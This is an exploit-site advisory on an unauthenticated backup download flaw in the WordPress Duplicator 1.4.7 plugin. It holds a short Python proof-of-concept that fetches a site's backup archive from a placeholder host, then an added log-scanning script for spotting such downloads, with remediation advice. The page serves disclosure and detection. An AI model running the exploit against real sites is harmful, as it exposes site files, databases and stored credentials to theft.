## https://sploitus.com/exploit?id=PACKETSTORM:167919
## Title: WordPress Plugin Duplicator 1.4.7 - Unauthenticated Backup Download  
## Author: nu11secur1ty  
## Date: 08.03.2022  
## Vendor: https://wordpress.org/  
## Software: https://wordpress.org/plugins/duplicator/  
## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/WordPress/2022/Duplicator%20%E2%80%93%20WordPress-Migration-Plugin  
## Description:  
The WordPress plugin Duplicator 1.4.7 allows unauthenticated backup download.  
Duplicator Lite writes its site backups as ZIP archives under `wp-content/backups-dup-lite/`, and the web server hands them out as ordinary static files, with no WordPress login or session check in the path. Anyone who knows the archive's name can therefore pull a complete copy of the site (Duplicator packages the site files together with a database export).  
Note that the exploit below hardcodes the archive name, which contains a 20-hex-character segment; the advisory does not describe how that name is obtained, so in practice it has to be leaked, listed (e.g. via directory indexing) or otherwise known to the attacker.  
Status: CRITICAL  
  
[+] Exploit:  
  
```python
#!/usr/bin/env python3
# Author nu11secur1ty
import requests

# Duplicator Lite stores backups under wp-content/backups-dup-lite/.
# The exploit assumes the full archive name (including the 20-hex-char
# segment) is already known; replace host and filename with the target's.
archive_name = "20220803_pwned_28dce10d86c575519304_20220803113819_archive.zip"
vulnerableURL = ("http://pwned_host.com/wordpress/wp-content/backups-dup-lite/"
                 + archive_name)

# No authentication or cookie is needed: the archive is served as a static file.
response = requests.get(vulnerableURL, timeout=30)
response.raise_for_status()

with open(archive_name, "wb") as f:
    f.write(response.content)

print("Right now, you just downloaded the secret archive =)\n")
```
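For defenders, the useful counterpart to the exploit above is to find out whether the backup directory was ever listed or an archive was ever fetched. The script below is an added example, not part of the advisory or of Duplicator itself: it scans Apache/nginx "combined"-format access log lines for requests that touch `wp-content/backups-dup-lite/`, classifies them as a directory listing, an archive download or other access, and records whether the server actually served content (200, or 206 for a ranged download) or blocked the request. The archive naming pattern `<yyyymmdd>_<name>_<20 hex>_<yyyymmddHHMMSS>_archive.zip` is an assumption generalised from the single filename in the advisory, and the log lines are constructed.

```python
#!/usr/bin/env python3
"""Flag Duplicator Lite backup exposure in combined-format access logs.

Added example (not from the advisory). The archive name pattern is assumed
from the one filename shown in the exploit; the sample log is constructed.
"""
import re
from typing import Dict, List, Optional

# Combined log format: ip ident user [time] "METHOD path PROTO" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)

BACKUP_DIR = "/wp-content/backups-dup-lite/"

# <yyyymmdd>_<name>_<20 hex>_<yyyymmddHHMMSS>_archive.zip (assumed pattern).
# The 20-hex-char segment is the part an attacker must know or obtain.
ARCHIVE_RE = re.compile(
    r"^(?P<date>\d{8})_(?P<name>[^/]+?)_(?P<hash>[0-9a-f]{20})_"
    r"(?P<stamp>\d{14})_archive\.zip$"
)

# Constructed sample: one listing of the backup directory, one successful
# archive download (note the python-requests UA), one blocked and one missing.
SAMPLE_LOG = """\
203.0.113.7 - - [03/Aug/2022:11:40:02 +0000] "GET /wordpress/wp-content/backups-dup-lite/ HTTP/1.1" 200 1543 "-" "Mozilla/5.0"
203.0.113.7 - - [03/Aug/2022:11:40:09 +0000] "GET /wordpress/wp-content/backups-dup-lite/20220803_pwned_28dce10d86c575519304_20220803113819_archive.zip HTTP/1.1" 200 48213377 "-" "python-requests/2.28.1"
198.51.100.4 - - [03/Aug/2022:11:41:15 +0000] "GET /wordpress/wp-content/backups-dup-lite/20220803_pwned_28dce10d86c575519304_20220803113819_archive.zip HTTP/1.1" 403 199 "-" "Mozilla/5.0"
192.0.2.10 - - [03/Aug/2022:11:42:00 +0000] "GET /wordpress/wp-content/backups-dup-lite/20220101_pwned_0123456789abcdef0123_20220101000000_archive.zip HTTP/1.1" 404 199 "-" "curl/7.81.0"
192.0.2.10 - - [03/Aug/2022:11:42:30 +0000] "GET /wordpress/index.php HTTP/1.1" 200 5012 "-" "curl/7.81.0"
"""


def parse_log_line(line: str) -> Optional[Dict[str, str]]:
    """Return the fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def classify_path(path: str) -> Optional[Dict[str, object]]:
    """Classify a request path: directory listing, archive download, other, or None."""
    path = path.split("?", 1)[0]                  # ignore any query string
    if path.endswith(BACKUP_DIR.rstrip("/")):     # tolerate a missing trailing slash
        path += "/"
    idx = path.find(BACKUP_DIR)
    if idx == -1:
        return None
    rest = path[idx + len(BACKUP_DIR):]
    if rest == "":
        return {"kind": "directory_listing", "archive": None}
    m = ARCHIVE_RE.match(rest)
    if m:
        return {"kind": "archive_download", "archive": m.groupdict()}
    return {"kind": "other_backup_dir_access", "archive": None}


def find_backup_exposure(lines: List[str]) -> List[Dict[str, object]]:
    """One record per GET/HEAD that touches the backup directory.

    'success' is True when content was actually served (200, or 206 for a
    ranged download); blocked or failed probes are kept so probing is visible.
    """
    hits: List[Dict[str, object]] = []
    for line in lines:
        rec = parse_log_line(line)
        if not rec or rec["method"] not in ("GET", "HEAD"):
            continue
        cls = classify_path(rec["path"])
        if cls is None:
            continue
        hits.append({
            "ip": rec["ip"],
            "time": rec["time"],
            "path": rec["path"],
            "status": int(rec["status"]),
            "success": rec["status"] in ("200", "206"),
            **cls,
        })
    return hits


def successful_downloads(hits: List[Dict[str, object]]) -> List[Dict[str, object]]:
    """Only the archive fetches that the server actually completed."""
    return [h for h in hits if h["success"] and h["kind"] == "archive_download"]


if __name__ == "__main__":
    found = find_backup_exposure(SAMPLE_LOG.splitlines())
    for h in found:
        print(f'{h["time"]} {h["ip"]} {h["status"]} {h["kind"]} {h["path"]}')
    print(f"{len(successful_downloads(found))} archive(s) actually served")
```

Run it against `/var/log/apache2/access.log` (or the nginx equivalent) by replacing `SAMPLE_LOG` with the file contents. A `directory_listing` hit with status 200 means the archive names were exposed to that client, and any `archive_download` with `success` true should be treated as a full site compromise (files and database), so rotate the credentials in `wp-config.php` and anything else the backup contained.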
  
## Reproduce:  
[GitHub: CVE-nu11secur1ty / Duplicator – WordPress-Migration-Plugin](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/WordPress/2022/Duplicator%20%E2%80%93%20WordPress-Migration-Plugin)  
  
## Proof and Exploit:  
[Video demonstration (streamable)](https://streamable.com/n3osob)